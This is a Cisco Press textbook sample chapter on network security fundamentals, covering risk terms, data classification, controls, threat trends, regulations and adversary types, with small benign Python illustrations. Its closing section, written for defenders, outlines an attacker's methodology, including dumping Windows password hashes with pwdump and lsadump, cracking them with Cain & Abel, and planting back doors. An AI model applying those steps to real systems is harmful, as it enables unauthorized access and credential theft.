
Network Security Concepts and Policies

  • Sample Chapter is provided courtesy of Cisco Press.
  • Date: Feb 5, 2013.

Chapter Description

In this chapter, you learn how to develop a comprehensive network security policy to counter threats against information security. You also learn about possible threats and how to describe and implement the process of developing a security policy.

In this chapter, you learn about the following topics:

  • Fundamental concepts in network security, including identification of common vulnerabilities and threats, and mitigation strategies
  • Implementation of a security architecture using a lifecycle approach, including the phases of the process, their dependencies, and the importance of a sound security policy

The open nature of the Internet makes it vital for businesses to pay attention to the security of their networks. As companies move more of their business functions to the public network, they need to take precautions to ensure that the data cannot be compromised and that the data is not accessible to anyone who is not authorized to see it.

Unauthorized network access by an outside hacker or a disgruntled employee can cause damage or destruction to proprietary data, negatively affect company productivity, and impede the capability to compete. The Computer Security Institute reported in its 2010/2011 CSI Computer Crime and Security Survey (available at http://gocsi.com/survey) that on an average day, 41.1 percent of respondents dealt with at least one security incident (see page 11 of the survey). Unauthorized network access can also harm relationships with customers and business partners, who might question the capability of a company to protect its confidential information. The definition of “data location” is being blurred by cloud computing services and other service trends. Individuals and corporations benefit from the elastic deployment of services in the cloud, available at all times from any device, but these dramatic changes in the business services industry exacerbate the risks in protecting data and the entities using it (individuals, businesses, governments, and so on). Security policies and architectures therefore require sound principles and a lifecycle approach, whether the data is in the server farm, mobile on the employee’s laptop, or stored in the cloud.

To start on our network security quest, this chapter examines the need for security, looks at what you are trying to protect, and examines the different trends for attacks and protection and the principles of secure network design. These concepts are important not only for succeeding on the IINS 640-554 exam, but also as fundamentals for all the security endeavors on which you will embark.

Building Blocks of Information Security

Establishing and maintaining a secure computing environment is increasingly difficult as networks become more interconnected and data flows ever more freely. In the commercial world, connectivity is no longer optional, and the possible risks of connectivity do not outweigh the benefits. Therefore, it is very important to enable networks to support security services that provide adequate protection to companies that conduct business in a relatively open environment. This section explains the breadth of assumptions and challenges involved in establishing and maintaining a secure network environment.

Basic Security Assumptions

Several new assumptions have to be made about computer networks because of their evolution over the years:

  • Modern networks are very large, very interconnected, and run both ubiquitous protocols (such as IP) and proprietary protocols. Therefore, they are often open to access, and a potential attacker can with relative ease attach to, or remotely access, such networks. Widespread IP internetworking increases the probability that more attacks will be carried out over large, heavily interconnected networks, such as the Internet.
  • Computer systems and applications that are attached to these networks are becoming increasingly complex. In terms of security, it becomes more difficult to analyze, secure, and properly test the security of the computer systems and applications; it is even more so when virtualization is involved. When these systems and their applications are attached to large networks, the risk to computing dramatically increases.

Basic Security Requirements

To provide adequate protection of network resources, the procedures and technologies that you deploy need to guarantee three things, sometimes referred to as the CIA triad:

  • Confidentiality: Providing confidentiality of data guarantees that only authorized users can view sensitive information.
  • Integrity: Providing integrity of data guarantees that only authorized users can change sensitive information and provides a way to detect whether data has been tampered with during transmission; this might also guarantee the authenticity of data.
  • Availability of systems and data: System and data availability provides uninterrupted access by authorized users to important computing resources and data.

When designing network security, a designer must be aware of the following:

  • The threats (possible attacks) that could compromise security
  • The associated risks of the threats (that is, how relevant those threats are for a particular system)
  • The cost to implement the proper security countermeasures for a threat
  • A cost versus benefit analysis to determine whether it is worthwhile to implement the security countermeasures

Data, Vulnerabilities, and Countermeasures

Although viruses, worms, and hackers monopolize the headlines about information security, risk management is the most important aspect of security architecture for administrators. A less exciting and glamorous area, risk management is based on specific principles and concepts that are related to asset protection and security management.

An asset is anything of value to an organization. By knowing which assets you are trying to protect, as well as their value, location, and exposure, you can more effectively determine the time, effort, and money to spend in securing those assets.

A vulnerability is a weakness in a system or its design that could be exploited by a threat. Vulnerabilities are sometimes found in the protocols themselves, as in the case of some security weaknesses in TCP/IP. Often, the vulnerabilities are in the operating systems and applications.

Written security policies might also be a source of vulnerabilities. This is the case when written policies are too lax or are not thorough enough in providing a specific approach or line of conduct to network administrators and users.

A threat is any potential danger to assets. A threat is realized when someone or something identifies a specific vulnerability and exploits it, creating exposure. If the vulnerability exists theoretically but has not yet been exploited, the threat is considered latent. The entity that takes advantage of the vulnerability is known as the threat agent or threat vector.

A risk is the likelihood that a particular threat using a specific attack will exploit a particular vulnerability of a system that results in an undesirable consequence. Although the roof of the data center might be vulnerable to being penetrated by a falling meteor, for example, the risk is minimal because the likelihood of that threat being realized is negligible.
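
Risk is often expressed quantitatively as the product of the likelihood of a threat exploiting a vulnerability and the resulting impact. The following minimal Python sketch uses the common annualized loss expectancy formula (ALE = SLE x ARO), which is not introduced in this chapter; the threats and dollar figures are purely hypothetical assumptions used for illustration:

    # Hypothetical figures only; real assessments use organization-specific
    # asset values and historically derived frequencies.
    threats = [
        # (description, single loss expectancy in dollars, annualized rate of occurrence)
        ("Web server defacement", 20_000, 0.5),
        ("Laptop theft exposing customer data", 150_000, 0.1),
        ("Meteor strike on the data center", 10_000_000, 0.000001),
    ]

    for description, sle, aro in threats:
        ale = sle * aro  # annualized loss expectancy = SLE x ARO
        print(f"{description:40s} ALE = ${ale:,.2f}")

Note how the meteor scenario, despite its enormous impact, yields a negligible annualized loss because its likelihood is negligible, mirroring the example above.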

An exploit happens when computer code is developed to take advantage of a vulnerability. For example, suppose that a vulnerability exists in a piece of software, but nobody knows about this vulnerability. Although the vulnerability exists theoretically, there is no exploit yet developed for it. Because there is no exploit, there really is no problem yet.

A countermeasure is a safeguard that mitigates a potential risk. A countermeasure mitigates risk either by eliminating or reducing the vulnerability or by reducing the likelihood that a threat agent will be able to exploit the vulnerability.

Data Classification

To optimally allocate resources and secure assets, it is essential that some form of data classification exists. By identifying which data has the most worth, administrators can put their greatest effort toward securing that data. Without classification, data custodians find it almost impossible to adequately secure the data, and IT management finds it equally difficult to optimally allocate resources.

Sometimes information classification is a regulatory requirement (required by law), in which case there might be liability issues that relate to the proper care of data. By classifying data correctly, data custodians can apply the appropriate confidentiality, integrity, and availability controls to adequately secure the data, based on regulatory, liability, and ethical requirements. When an organization takes classification seriously, it illustrates to everyone that the company is taking information security seriously.

The methods and labels applied to data differ all around the world, but some patterns do emerge. The following is a common way to classify data that many government organizations, including the military, use:

  • Unclassified: Data that has little or no confidentiality, integrity, or availability requirements; therefore, little effort is made to secure it.
  • Restricted: Data that if leaked could have undesirable effects on the organization. This classification is common among NATO (North Atlantic Treaty Organization) countries but is not used by all nations.
  • Confidential: Data that must comply with confidentiality requirements. This is the lowest level of classified data in this scheme.
  • Secret: Data for which you take significant effort to keep secure because its disclosure could lead to serious damage. The number of individuals who have access to this data is usually considerably fewer than the number of people who are authorized to access confidential data.
  • Top secret: Data for which you make great effort and sometimes incur considerable cost to guarantee its secrecy since its disclosure could lead to exceptionally grave damage. Usually a small number of individuals have access to top-secret data, on condition that there is a need to know.
  • Sensitive But Unclassified (SBU): A popular classification by government that designates data that could prove embarrassing if revealed, but no great security breach would occur. SBU is a broad category that also includes the For Official Use Only designation.

It is important to point out that there is no actual standard for private-sector classification. Furthermore, different countries tend to have different approaches and labels. Nevertheless, it can be instructive to examine a common, private sector classification scheme:

  • Public: Companies often display public data in marketing literature or on publicly accessible websites.
  • Sensitive: Data in this classification is similar to the SBU classification in the government model. Some embarrassment might occur if this data is revealed, but no serious security breach is involved.
  • Private: Private data is important to an organization. You make an effort to maintain the secrecy and accuracy of this data.
  • Confidential: Companies make the greatest effort to secure confidential data. Trade secrets and employee personnel files are examples of what a company would commonly classify as confidential.

Regardless of the classification labeling used, what is certain is that as the security classification of a document increases, the number of staff that should have access to that document should decrease, as illustrated in Figure 1-1.

Figure 1-1. Ratio: Staff Access to Information Security Classification
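
As a purely illustrative sketch of this principle, the government-style labels described earlier can be modeled in Python as an ordered set, so that an access check compares a user's clearance against a document's label; the clearance-check function itself is an assumption for demonstration, not a mechanism prescribed by any of the classification schemes:

    from enum import IntEnum

    class Classification(IntEnum):
        # Ordered labels from the government-style scheme described earlier.
        UNCLASSIFIED = 0
        RESTRICTED = 1
        CONFIDENTIAL = 2
        SECRET = 3
        TOP_SECRET = 4

    def may_read(clearance: Classification, label: Classification) -> bool:
        # The higher the label, the fewer people hold a sufficient clearance.
        return clearance >= label

    print(may_read(Classification.SECRET, Classification.CONFIDENTIAL))   # True
    print(may_read(Classification.RESTRICTED, Classification.TOP_SECRET)) # False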

Many factors go into the decision of how to classify certain data. These factors include the following:

  • Value: Value is the number one criterion. Not all data has the same value. The home address and medical information of an employee are considerably more sensitive (valuable) than the name of the chief executive officer (CEO) and the main telephone number of the company.
  • Age: For many types of data, its importance changes with time. For example, an army general will go to great lengths to restrict access to military secrets. But after the war is over, the information is gradually less and less useful and eventually is declassified.
  • Useful life: Often data is valuable for only a set window of time, and after that window has expired, there is no need to keep it classified. An example of this type of data is confidential information about the products of a company. The useful life of the trade secrets of products typically expires when the company no longer sells the product.
  • Personal association: Data of this type usually involves something of a personal nature. Much of the government data regarding employees is of this nature. Steps are usually taken to protect this data until the person is deceased.

For a classification system to work, there must be different roles that are fulfilled. The most common of these roles are as follows:

  • Owner: The owner is the person who is ultimately responsible for the information, usually a senior-level manager who is in charge of a business unit. The owner classifies the data and usually selects custodians of the data and directs their actions. It is important that the owner periodically review the classified data because the owner is ultimately responsible for the data.
  • Custodian: The custodian is usually a member of the IT staff who has the day-to-day responsibility for data maintenance. Because the owner of the data is not required to have technical knowledge, the owner decides the security controls but the custodian marks the data to enforce these security controls. To maintain the availability of the data, the custodian regularly backs up the data and ensures that the backup media is secure. Custodians also periodically review the security settings of the data as part of their maintenance responsibilities.
  • User: Users bear no responsibility for the classification of data or even the maintenance of the classified data. However, users do bear responsibility for using the data in accordance with established operational procedures so that they maintain the security of the data while it is in their possession.

Vulnerabilities Classifications

It is also important to understand the weaknesses in security countermeasures and operational procedures. This understanding results in more effective security architectures. When analyzing system vulnerabilities, it helps to categorize them in classes to better understand the reasons for their emergence. You can classify the main vulnerabilities of systems and assets using broad categories:

  • Policy flaws
  • Design errors
  • Protocol weaknesses
  • Software vulnerabilities
  • Misconfiguration
  • Hostile code
  • Human factor

This list mentions just a few of the vulnerability categories. For each of these categories, multiple vulnerabilities could be listed.

There are several industry efforts that are aimed at categorizing threats for the public domain. These are some well-known, publicly available catalogs that may be used as templates for vulnerability analysis:

  • Common Vulnerabilities and Exposures (CVE): A dictionary of publicly known information security vulnerabilities and exposures. It can be found at http://cve.mitre.org/. The database provides common identifiers that enable data exchange between security products, providing a baseline index point for evaluating coverage of tools and services.
  • National Vulnerability Database (NVD): The U.S. government repository of standards-based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance. NVD includes databases of security checklists, security-related software flaws, misconfigurations, product names, and impact metrics. The database can be found at http://nvd.nist.gov.
  • Common Vulnerability Scoring System (CVSS): A standard within the computer and networking fields for assessing and classifying security vulnerabilities. This standard is focused on rating a vulnerability compared to others, thus helping the administrator to set priorities. This standard was adopted by significant players in the industry such as McAfee, Qualys, Tenable, and Cisco. More information can be found, including the database and calculator, at http://www.first.org/cvss.
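
To illustrate how CVSS communicates the characteristics of a vulnerability, the following Python sketch decodes a CVSS version 2 base vector string into readable metrics. The metric abbreviations follow the public CVSS v2 specification, but the sample vector is an assumption chosen for demonstration, and the sketch deliberately does not compute the numeric score:

    # Minimal CVSS v2 base-vector decoder (illustrative only; no score calculation).
    METRICS = {
        "AV": ("Access Vector",     {"L": "Local", "A": "Adjacent Network", "N": "Network"}),
        "AC": ("Access Complexity", {"H": "High", "M": "Medium", "L": "Low"}),
        "Au": ("Authentication",    {"M": "Multiple", "S": "Single", "N": "None"}),
        "C":  ("Confidentiality",   {"N": "None", "P": "Partial", "C": "Complete"}),
        "I":  ("Integrity",         {"N": "None", "P": "Partial", "C": "Complete"}),
        "A":  ("Availability",      {"N": "None", "P": "Partial", "C": "Complete"}),
    }

    def decode(vector: str) -> dict:
        readable = {}
        for part in vector.split("/"):
            metric, value = part.split(":")
            name, meanings = METRICS[metric]
            readable[name] = meanings[value]
        return readable

    # Example: a remotely exploitable flaw requiring no authentication, with partial impact.
    print(decode("AV:N/AC:L/Au:N/C:P/I:P/A:P"))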

Countermeasures Classification

After assets (data) and vulnerabilities, threats are the most important component to understand. Threat classification and analysis, as part of the risk management architecture, will be described later in this chapter.

Once threat vectors are considered, organizations rely on various controls to accomplish defense in depth as part of their security architecture. There are several ways to classify these security controls; one of them is based on the nature of the control itself. These controls fall into one of three categories:

  • Administrative: Controls that are largely policies and procedures
  • Technical: Controls that involve electronics, hardware, software, and so on
  • Physical: Controls that are mostly mechanical

Later in this chapter, we will discuss models and frameworks from different organizations that can be used to implement network security best practices.

Administrative Controls

Administrative controls are largely policy and procedure driven. You will find many of the administrative controls that help with an enterprise’s information security in the human resources department. Some of these controls are as follows:

  • Security-awareness training
  • Security policies and standards
  • Change controls and configuration controls
  • Security audits and tests
  • Good hiring practices
  • Background checks of contractors and employees

For example, if an organization has strict hiring practices that require drug testing and background checks for all employees, the organization will likely hire fewer individuals of questionable character. With fewer people of questionable character working for the company, it is likely that there will be fewer problems with internal security issues. These controls do not single-handedly secure an enterprise, but they are an important part of an information security program.

Technical Controls

Technical controls are extremely important to a good information security program, and proper configuration and maintenance of these controls will significantly improve information security. The following are examples of technical controls:

  • Firewalls
  • Intrusion prevention systems (IPS)
  • Virtual private network (VPN) concentrators and clients
  • TACACS+ and RADIUS servers
  • One-time password (OTP) solutions
  • Smart cards
  • Biometric authentication devices
  • Network Admission Control (NAC) systems
  • Routers with ACLs

Physical Controls

While trying to secure an environment with good technical and administrative controls, it is also necessary that you lock the doors in the data center. This is an example of a physical control. Other examples of physical controls include the following:

  • Intruder detection systems
  • Security guards
  • Locks
  • Safes
  • Racks
  • Uninterruptible power supplies (UPS)
  • Fire-suppression systems
  • Positive air-flow systems

When security professionals examine physical security requirements, life safety (protecting human life) should be their number one concern. Good planning is needed to balance life safety concerns against security concerns. For example, permanently barring a door to prevent unauthorized physical access might prevent individuals from escaping in the event of a fire. By the way, physical security is a field that Cisco entered a few years ago. More information on those products can be found at http://www.cisco.com/go/physicalsecurity.

Controls are also categorized by the type of control they are:

  • Preventive: The control prevents access.
  • Deterrent: The control deters access.
  • Detective: The control detects access.

All three categories of controls can be any one of the three types of controls; for example, a preventive control can be administrative, physical, or technical.

Preventive controls exist to prevent compromise. This statement is true whether the control is administrative, technical, or physical. The ultimate purpose for these controls is to stop security breaches before they happen.

However, a good security design also prepares for failure, recognizing that prevention will not always work. Therefore, detective controls are also part of a comprehensive security program because they enable you to detect a security breach and to determine how the network was breached. With this knowledge, you should be able to better secure the data the next time.

With effective detective controls in place, the incident response team can use them to figure out what went wrong, allowing you to immediately make changes to policies and prevent a repeat of that same breach. Without detective controls, it is extremely difficult to determine what you need to change.

Deterrent controls are designed to scare away a certain percentage of adversaries to reduce the number of incidents. Cameras in bank lobbies are a good example of a deterrent control. The cameras most likely deter at least some potential bank robbers. The cameras also act as a detective control.

Need for Network Security

Business goals and risk analysis drive the need for network security. For a while, information security was influenced to some extent by fear, uncertainty, and doubt. Examples of these influences included the fear of a new worm outbreak, the uncertainty of providing web services, or doubts that a particular leading-edge security technology would fail. But we realized that regardless of the security implications, business needs had to come first.

If your business cannot function because of security concerns, you have a problem. The security system design must accommodate the goals of the business, not hinder them. Therefore, risk management involves answering two key questions:

  • What does the cost-benefit analysis of your security system tell you?
  • How will the latest attack techniques play out in your network environment?

Figure 1-2 illustrates the key factors you should consider when designing a secure network:

  • Business needs: What does your organization want to do with the network?
  • Risk analysis: What is the risk and cost balance?
  • Security policy: What are the policies, standards, and guidelines that you need to address business needs and risks?
  • Industry best practices: What are the reliable, well-understood, and recommended security best practices?
  • Security operations: These operations include incident response, monitoring, maintenance, and auditing the system for compliance.

Figure 1-2. Factors Affecting the Design of a Secure Network

Risk management and security policies will be detailed later in this chapter.

Intent Evolution

When viewed from the perspective of motivation intersecting with opportunity, risk management can be driven not only by the techniques or sophistication of the attackers and threat vectors, but also by their motives. Research reveals that hackers are increasingly motivated by profit, where in the past they were motivated by notoriety and fame. In instances of attacks carried out for financial gains, hackers are not looking for attention, which makes their exploits harder to detect. Few signatures exist or will ever be written to capture these “custom” threats. In order to be successful in defending your environments, you must employ a new model to catch threats across the infrastructure.

Attackers are also motivated by government or industrial espionage. The Stuxnet worm, whose earliest versions appear to date to 2009, is an example. This worm differs from its malware “cousins” in that it has a specific, damaging goal: to traverse industrial control systems, such as supervisory control and data acquisition (SCADA) systems, so that it can reprogram the programmable logic controllers, possibly disrupting industrial operations.

This worm was not created to gather credit card numbers to sell off to the highest bidder, or to sell fake pharmaceuticals. This worm appears to have been created solely to invade public or private infrastructure. The cleverness of Stuxnet lies in its ability to traverse non-networked systems, which means that even systems unconnected to networks or the Internet are at risk.

Security experts have called Stuxnet “the smartest malware ever.” This worm breaks the malware mold because it is designed to disrupt industrial control systems in critical infrastructure. This ability should be a concern for every government.

Motivation can also be political or take the form of vigilantism. Anonymous is currently the best-known hacktivist group. As a recent example of its activities, in May 2012, Anonymous attacked the website of the Quebec government after it promulgated a law imposing new requirements on the right of college and university students to protest.

Threat Evolution

The nature and sophistication of threats, as well as their pervasiveness and global nature, are trends to watch. Figure 1-3 shows how the threats that organizations face have evolved over the past few decades, and how the growth rate of vulnerabilities that are reported in operating systems and applications is rising. The number and variety of viruses and worms that have appeared over the past three years are daunting, and their rate of propagation is frightening. There have been unacceptable levels of business outages and expensive remediation projects that consume staff, time, and funds that were not originally budgeted for such tasks.

Figure 1-3. Shrinking Time Frame from Knowledge of Vulnerability to Release of Exploits

New exploits are designed to have global impact in minutes. Blended threats, which use multiple means of propagation, are more sophisticated than ever. The trends are becoming regional and global in nature. Early attacks affected single systems or one organization's network, while more recent attacks affect entire regions. For example, attacks have expanded from individual denial of service (DoS) attacks launched by a single attacker against a single target, to large-scale distributed DoS (DDoS) attacks emanating from networks of compromised systems that are known as botnets.

Threats are also becoming persistent. After an attack starts, attacks may appear in waves as infected systems join the network. Because environments are so complex, with so many end users (employees, vendors, and contractors), multiple types of endpoints (company desktop, home, and server), and multiple types of access (wired, wireless, VPN, and dial-up), infections are difficult to eradicate.

More recent threat vectors are increasingly sophisticated, and the motivation of the attackers is reflected in their impact. Recent threat vectors include the following:

  • Cognitive threats via social networks (likejacking): Social engineering takes a new meaning in the era of social networking. From phishing attacks that target social network accounts of high-profile individuals, to information exposure due to lack of policy, social networks have become a target of choice for malicious attackers.
  • PDA and consumer electronics exploits: The operating systems on consumer devices (smartphones, PDAs, and so on) are an option of choice for high-volume attacks. The proliferation of applications for these operating systems, and the nature of the development and certification processes for those applications, augments the problem.
  • Widespread website compromises: Malicious attackers compromise popular websites, making the sites download malware to connecting users. Attackers typically are not interested in the data on the website, but use it as a springboard to infect the users of the site.
  • Disruption of critical infrastructure: The Stuxnet malware, which exploits holes in Windows systems and targets a specific Siemens supervisory control and data acquisition (SCADA) program with sabotage, confirmed concerns about an increase in targeted attacks aimed at the power grid, nuclear plants, and other critical infrastructure.
  • Virtualization exploits: Device and service virtualization add more complexity to the network. Attackers know this and are increasingly targeting virtual servers, virtual switches, and trust relationships at the hypervisor level.
  • Memory scraping: Increasingly popular, this technique is aimed at fetching information directly from volatile memory. The attack tries to exploit operating systems and applications that leave traces of data in memory. Attacks are particularly aimed at encrypted information that may be processed as unencrypted in volatile memory.
  • Hardware hacking: These attacks are aimed at exploiting the hardware architecture of specific devices, with consumer devices being increasingly popular. Attack methods include bus sniffing, altering firmware, and memory dumping to find crypto keys.
  • IPv6-based attacks: These attacks could become more pervasive as the migration to IPv6 becomes widespread. Attackers are focusing initially on covert channels through various tunneling techniques, and man-in-the-middle attacks leverage IPv6 to exploit IPv4 in dual-stack deployments.

Trends Affecting Network Security

Other trends in business, technology, and innovation influence the need for new paradigms in information security. Mobility is one trend. Expect to see billions of new network mobile devices moving into the enterprise worldwide over the next few years. Taking into consideration constant reductions and streamlining in IT budgets, organizations face serious challenges in supporting a growing number of mobile devices at a time when their resources are being reduced.

The second market transition is cloud computing and cloud services. Organizations of all kinds are taking advantage of offerings such as Software as a Service (SaaS) and Infrastructure as a Service (IaaS) to reduce costs and simplify the deployment of new services and applications.

These cloud services add challenges in visibility (how do you identify and mitigate threats that come to and from a trusted network?), control (who controls the physical assets, encryption keys, and so on?), and trust (do you trust cloud partners to ensure that critical application data is still protected when it is off the enterprise network?).

The third market transition is about changes to the workplace experience. Borders are blurring in the organization between consumers and workers and between the various functions within the organization. The borders between the company and its partners, customers, and suppliers are also fading. As a result, the network is experiencing increasing demand to connect anyone, any device, anywhere, at any time.

These changes represent a challenge to security teams within the organization. These teams now need to manage noncontrolled consumer devices, such as a personal tablet, coming into the network, and provide seamless and context-aware services to users all over the world. The location of the data and services accessed by the users is almost irrelevant. The data could be internal to the organization or it could be in the cloud. This situation makes protecting data and services a challenging proposition.

Attacks are increasingly politically and financially motivated, driven by botnets, and aimed at critical infrastructure, as the following trends illustrate:

One of the trends in threats is the exploitation of trust. Whether they are creating malware that can subvert industrial processes or tricking social network users into handing over login and password information, cybercriminals have a powerful weapon at their disposal: the exploitation of trust. Cybercriminals have become skilled at convincing users that their infected links and URLs are safe to click, and that they are someone the user knows and trusts. Hackers exploit the trust we have in TinyURLs and in security warning banners. With stolen security credentials, cybercriminals can freely interact with legitimate software and systems.

Nowhere is this tactic more widespread than within social networking, where cybercriminals continue to attract victims who are willing to share information with people they believe are known to them, with malware such as Koobface. One noticeable shift in social engineering is that criminals are spending more time figuring out how to assume someone’s identity, perhaps by generating emails from an individual’s computer or social networking account. A malware-laden email or scam sent by a “trusted person” is more likely to elicit a click-through response than the same message sent by a stranger.

Threats originating from countries outside of the United States are rapidly increasing. Global annual spam volumes actually dropped in 2010, the first time this has happened in the history of the Internet. However, spammers are originating in increasingly varied locations and countries.

Money muling is the practice of hiring individuals as “mules,” recruited by handlers or “wranglers” to set up bank accounts, or even use their own bank accounts, to assist in the transfer of money from the account of a fraud victim to another location, usually overseas, via a wire transfer or automated clearing house (ACH) transaction. Money mule operations often involve individuals in multiple countries.

Web malware is definitely on the rise. The number of distinct domains that are compromised to download malware to connecting users is increasing dramatically. The most dangerous aspect of this type of attack is the fact that users do not need to do much to get infected. Many times, the combination of malware on the website and vulnerabilities on web browsers is enough to provoke infection just by connecting to the website. The more popular the site, the higher the volume of potential infection.

Recently there have been major shifts in the compliance landscape. Although enforcement of existing regulations has been weak in many jurisdictions worldwide, regulators and standards bodies are now tightening enforcement through expanded powers, higher penalties, and harsh enforcement actions. In the future it will be more difficult to hide failures in information security wherever organizations do business. Legislators are forcing transparency through the introduction of breach notification laws in Europe, Asia, and North America as data breach disclosure becomes a global principle.

As more regulations are introduced, there is a trend toward increasingly prescriptive rules. For example, recent amendments introduced in the United Kingdom in 2011 bring arguably more prescriptive information protection regulations to the Privacy and Electronic Communications Directive. Such laws are discussed in more detail later in this chapter. Any global enterprise that does business in the United Kingdom today will likely be covered by these regulations. Lately, regulators are also making it clear that enterprises are responsible for ensuring the protection of their data when it is being processed by a business partner, including cloud service providers. The new era of compliance creates formidable challenges for organizations worldwide.

For many organizations, stricter compliance could help focus management attention on security, but if managers take a “check-list approach” to compliance, it will detract from actually managing risk and may not improve security. The new compliance landscape will increase costs and risks. For example, it takes time and resources to substantiate compliance. Increased requirements for service providers give rise to more third-party risks.

With more transparency, there are now greater consequences for data breaches. For example, expect to see more litigation as customers and business partners seek compensation for compromised data. But the harshest judgments will likely come from the court of public opinion, with the potential to permanently damage an enterprise’s reputation.

The following are some of the U.S. and international regulations that many companies are subject to:

  • Sarbanes-Oxley (SOX)
  • Federal Information Security Management Act (FISMA)
  • Gramm-Leach-Bliley Act (GLBA)
  • Payment Card Industry Data Security Standard (PCI DSS)
  • Health Insurance Portability and Accountability Act (HIPAA)
  • Digital Millennium Copyright Act (DMCA)
  • Personal Information Protection and Electronic Documents Act (PIPEDA) in Canada
  • European Union Data Protection Directive (EU 95/46/EC)
  • Safe Harbor Act - European Union and United States
  • International Convergence of Capital Measurement and Capital Standards (Basel II)

The challenge becomes to comply with these regulations and, at the same time, make that compliance translate into an effective security posture.

Adversaries, Methodologies, and Classes of Attack

Who are hackers? What motivates them? How do they conduct their attacks? How do they manage to breach the measures we have in place to ensure confidentiality, integrity, and availability? Which best practices can we adopt to defeat hackers? These are some of the questions we try to answer in this section.

People are social beings, and it is quite common for systems to be compromised through social engineering. Harm can be caused by people just trying to be “helpful.” For example, in an attempt to be helpful, people have been known to give their passwords over the phone to attackers who have a convincing manner and say they are troubleshooting a problem and need to test access using a real user password. End users must be trained, and reminded, that the ultimate security of a system depends on their behavior.

Of course, people often cause harm within organizations intentionally: most security incidents are caused by insiders. Thus, strong internal controls on security are required, and special organizational practices might need to be implemented.

An example of a special organizational practice that helps to provide security is the separation of duty, where critical tasks require two or more persons to complete them, thereby reducing the risk of insider threat. People are less likely to attack or misbehave if they are required to cooperate with others.

Unfortunately, users frequently consider security too difficult to understand. Software often does not make security options or decisions easy for end users. Also, users typically prefer “whatever” functionality to no functionality. Implementation of security measures should not create an internally generated DoS condition, meaning that if security is too stringent or too cumbersome for users, either they will not have access to all the resources needed to perform their work or their performance will be hindered by the security operations.

Adversaries

To defend against attacks on information and information systems, organizations must begin to define the threat by identifying potential adversaries. These adversaries can include the following:

  • Nations or states
  • Terrorists
  • Criminals
  • Hackers
  • Corporate competitors
  • Disgruntled employees
  • Government agencies, such as the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI)

Hackers comprise the most well-known outside threat to information systems. They are not necessarily geniuses, but they are persistent people who have taken a lot of time to learn their craft.

Many titles are assigned to hackers:

  • Hackers: Hackers are computer enthusiasts who break into networks and systems to learn more about them. Hackers generally mean no harm and do not expect financial gain. Unfortunately, hackers may unintentionally pass valuable information on to people who do intend to harm the system. Hackers are subdivided into the following categories:
    • White hat (ethical hacker)
    • Blue hat (bug tester)
    • Gray hat (ethically questionable hacker)
    • Black hat (unethical hacker)
  • Crackers (criminal hackers): Crackers are hackers with a criminal intent to harm information systems. Crackers are generally working for financial gain and are sometimes called black hat hackers.
  • Phreakers (phone breakers): Phreakers pride themselves on compromising telephone systems. Phreakers reroute and disconnect telephone lines, sell wiretaps, and steal long-distance services.

  • Script kiddies: Script kiddies think of themselves as hackers, but have very low skill levels. They do not write their own code; instead, they run scripts written by other, more skilled attackers.

  • Hacktivists: Hacktivists are individuals who have a political agenda in doing their work. When government websites are defaced, this is usually the work of a hacktivist.

Methodologies

The goal of any hacker is to compromise the intended target or application. Hackers begin with little or no information about the intended target, but by the end of their analysis, they have accessed the network and have begun to compromise their target. Their approach is usually careful and methodical, not rushed and reckless. The seven-step process that follows is a good representation of the methods that hackers use:

  Step 1. Perform footprint analysis (reconnaissance).
  Step 2. Enumerate applications and operating systems.
  Step 3. Manipulate users to gain access.
  Step 4. Escalate privileges.
  Step 5. Gather additional passwords and secrets.
  Step 6. Install back doors.
  Step 7. Leverage the compromised system.

To successfully hack into a system, hackers generally first want to know as much as they can about the system. Hackers can build a complete profile, or “footprint,” of the company security posture. Using a range of tools and techniques, an attacker can discover the company domain names, network blocks, IP addresses of systems, ports and services that are used, and many other details that pertain to the company security posture as it relates to the Internet, an intranet, remote access, and an extranet. By following some simple advice, network administrators can make footprinting more difficult.
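
Much of this footprint is assembled with ordinary, legitimate lookups. As a minimal Python sketch (the hostname is a placeholder, and such queries should only be run against organizations you are authorized to assess), the standard library alone can map names to addresses and back:

    import socket

    host = "www.example.com"  # placeholder; substitute a host you are authorized to assess

    # Forward DNS lookup: hostname -> IP addresses.
    name, aliases, addresses = socket.gethostbyname_ex(host)
    print(f"{host} resolves to {addresses} (aliases: {aliases})")

    # Reverse lookup: IP -> hostname, which can reveal internal naming conventions.
    try:
        reverse_name, _, _ = socket.gethostbyaddr(addresses[0])
        print(f"{addresses[0]} reverse-resolves to {reverse_name}")
    except socket.herror:
        print("No reverse DNS record found")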

After hackers have completed a profile, or footprint, of your organization, they use tools such as those in the list that follows to enumerate additional information about your systems and networks. All these tools are readily available to download, and the security staff should know how these tools work. Additional tools (introduced later in the “Security Testing Techniques” section) can also be used to gather information and therefore hack.

  • Netcat: Netcat is a featured networking utility that reads and writes data across network connections.
  • Microsoft EPDump and Microsoft Remote Procedure Call (RPC) Dump: These tools provide information about Microsoft RPC services on a server.
  • GetMAC: This application provides a quick way to find the MAC (Ethernet) layer address and binding order for a computer running Microsoft Windows locally or across a network.
  • Software development kits (SDK): SDKs provide hackers with the basic tools that they need to learn more about systems.

Another common technique that hackers use is to manipulate users of an organization to gain access to that organization. There are countless cases of unsuspecting employees providing information to unauthorized people simply because the requesters appear innocent or to be in a position of authority. Hackers find names and telephone numbers on websites or domain registration records by footprinting. Hackers then directly contact these people by phone and convince them to reveal passwords. Hackers gather information without raising any concern or suspicion. This form of attack is called social engineering. One form of a social engineering attack is for the hacker to pose as a visitor to the company, a delivery person, a service technician, or some other person who might have a legitimate reason to be on the premises and, after gaining entrance, walk by cubicles and look under keyboards to see whether anyone has put a note there containing the current password.

The next thing the hacker typically does is review all the information that they have collected about the host, searching for usernames, passwords, and Registry keys that contain application or user passwords. This information can help hackers escalate their privileges on the host or network. If reviewing the information from the host does not reveal useful information, hackers may launch a Trojan horse attack in an attempt to escalate their privileges on the host. This type of attack usually means copying malicious code to the user system and giving it the same name as a frequently used piece of software.

After the hacker has obtained higher privileges, the next task is to gather additional passwords and other sensitive data. The targets now include such things as the local security accounts manager database or the Active Directory of a domain controller. Hackers use legitimate tools such as pwdump and lsadump applications to gather passwords from machines running Windows, which then can be cracked with the very popular Cain & Abel software tool. By cross-referencing username and password combinations, the hacker is able to obtain administrative access to all the computers in the network.

If hackers are detected trying to enter through the “front door,” or if they want to enter the system without being detected, they try to use “back doors” into the system. A back door is a method of bypassing normal authentication to secure remote access to a computer while attempting to remain undetected. The most common backdoor point is a listening port that provides remote access to the system for users (hackers) who do not have, or do not want to use, access or administrative privileges.

